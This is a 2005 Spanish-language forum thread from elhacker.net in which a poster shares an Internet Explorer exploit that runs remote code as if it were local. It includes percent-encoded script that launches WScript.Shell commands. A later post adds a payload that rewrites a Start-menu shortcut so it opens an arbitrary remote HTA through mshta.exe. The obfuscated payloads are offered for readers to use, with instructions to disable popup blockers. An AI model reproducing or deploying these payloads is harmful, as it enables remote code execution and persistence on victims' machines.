elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 09:37  


Tema destacado: Nueva página de elhacker.net en Google+ Google+

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  [°] Ejecutar codigo remoto, y hacerlo pasar por local. en IExplorer
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [°] Ejecutar codigo remoto, y hacerlo pasar por local. en IExplorer  (Leído 1,463 veces)
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
[°] Ejecutar codigo remoto, y hacerlo pasar por local. en IExplorer
« en: 2 Diciembre 2005, 08:21 »

Bueno, una respuesta de microsoft que no queria recibir:
Citar
..bla..bla...
also we would like to inform you that the bug you reported the day 09-11-2005
..bla..bla..
it has been cataloged as Low Risk
..bla..bla..
there wont be any type reward
..bla..bla..
Thank you for your understanding.
Por eso vuelvo a abrir el tema.




Muchos Exploits para IExplorer necesitan de que el exploit este en la zona %MYCOMPUTER% osea en disco duro y no en red.. pero pues amenos de que convensas a tu victima de guardar la pagina y despues ejecutarla denuevo, no servira de mucho. ahora antes de decirme que se guarda en tu pc todo el contenido web, deja te digo que lo se pero iexplorer sabe identificar cual es remoto y cual es local osea no sirve cache, ni historial ni favoritos..

pero como ejecutarlo?
pues haber si entienden el siguiente codigo:
Código:
<script>
document.local = "%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63%72%69%70%74%22%3E%0D%0A%53%65%74%20%6F%73%73%20%3D%20%43%72%65%61%74%65%4F%62%6A%65%63%74%28%22%57%73%63%72%69%70%74%2E%53%68%65%6C%6C%22%29%0D%0A%6F%73%73%2E%52%75%6E%20%22%72%75%6E%64%6C%6C%33%32%2E%65%78%65%20%75%73%65%72%33%32%2E%64%6C%6C%2C%4C%6F%63%6B%57%6F%72%6B%53%74%61%74%69%6F%6E%22%0D%0A%3C%2F%73%63%72%69%70%74%3E";
var v=open("file://c:/winnt/system32/no.hta","roc");
v.document.write('<img src="javascript:self.location.href='+"'file://c:/c.hta'"+'">');
open("javascript:document.write(unescape('"+escape(document.local)+"'));location.reload();","roc");
</script>

que hace esto?
ejecuta como local lo que este en document.local, necesitas hacerle un escape() al codigo antes de colocarlo ahi.

copien este codigo en bloc de notas y guardenlo como un archivo html.. RECUERDEN DESHABILITAR BLOQUEADOR DE POPUPS.
ahora, el codigo que puse aqui como ejemplo no es exploit.. es un comando legal, por eso les sacara advertencia, no coloque exploits.. porque no lo considere prudente.

Saludos!!
« Última modificación: 31 Diciembre 2005, 08:42 por Sirdarckcat » En línea

sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Ejecutar codigo remoto, y hacerlo pasar por local. en IExplorer
« Respuesta #1 en: 2 Diciembre 2005, 20:21 »

NO funciona en Windows XP SP2.. estoy trabajando en otro, para ver si puedo hacer esto funcionar.
Saludos
En línea

sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Ejecutar codigo remoto, y hacerlo pasar por local. en IExplorer
« Respuesta #2 en: 6 Diciembre 2005, 08:50 »

Definitivamente no es vulnerable SP2, nimodo, mientras dejo este codigo, que ejecuta un HTA malicioso en cualquier navegador menos SP2 (logicamente, debes poner tu HTA donde te lo pido, para los que no sepan que es HTA es un HTML pero sin restricciones y con permisos casi ilimitados).
Saludos
Código:
document.local=unescape("%3C%73%63%72%69%70%74%3E%0D%0A%76%61%72%20%6F%20%3D%20%6E%65%77%20%41%63%74%69%76%65%58%4F%62%6A%65%63%74%28%22%53%68%65%6C%6C%2E%41%70%70%6C%69%63%61%74%69%6F%6E%22%29%3B%0D%0A%6F%46%20%3D%20%6F%2E%4E%61%6D%65%53%70%61%63%65%28%22%43%3A%5C%5C%44%6F%63%75%6D%65%6E%74%73%20%61%6E%64%20%53%65%74%74%69%6E%67%73%5C%5C%41%6C%6C%20%55%73%65%72%73%5C%5C%4D%65%6E%FA%20%49%6E%69%63%69%6F%5C%5C%50%72%6F%67%72%61%6D%61%73%5C%5C%41%63%63%65%73%6F%72%69%6F%73%22%29%3B%0D%0A%6F%46%49%20%3D%20%6F%46%2E%50%61%72%73%65%4E%61%6D%65%28%22%50%61%69%6E%74%2E%6C%6E%6B%22%29%3B%0D%0A%6F%53%4C%20%3D%20%6F%46%49%2E%47%65%74%4C%69%6E%6B%3B%0D%0A%6F%53%4C%2E%50%61%74%68%20%3D%20%22%6D%73%68%74%61%2E%65%78%65%22%3B%0D%0A%6F%53%4C%2E%41%72%67%75%6D%65%6E%74%73%20%3D%22")+"URL"+unescape("%22%3B%0D%0A%6F%53%4C%2E%53%61%76%65%28%22%43%3A%5C%5C%61%2E%6C%6E%6B%22%29%3B%0D%0A%6F%2E%4F%70%65%6E%28%22%43%3A%5C%5C%61%2E%6C%6E%6B%22%29%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E");
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ejecutar codigo remoto a partir de un ddos
Hacking Avanzado
d00ze13 2 722 Último mensaje 14 Noviembre 2011, 23:09
por d00ze13
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines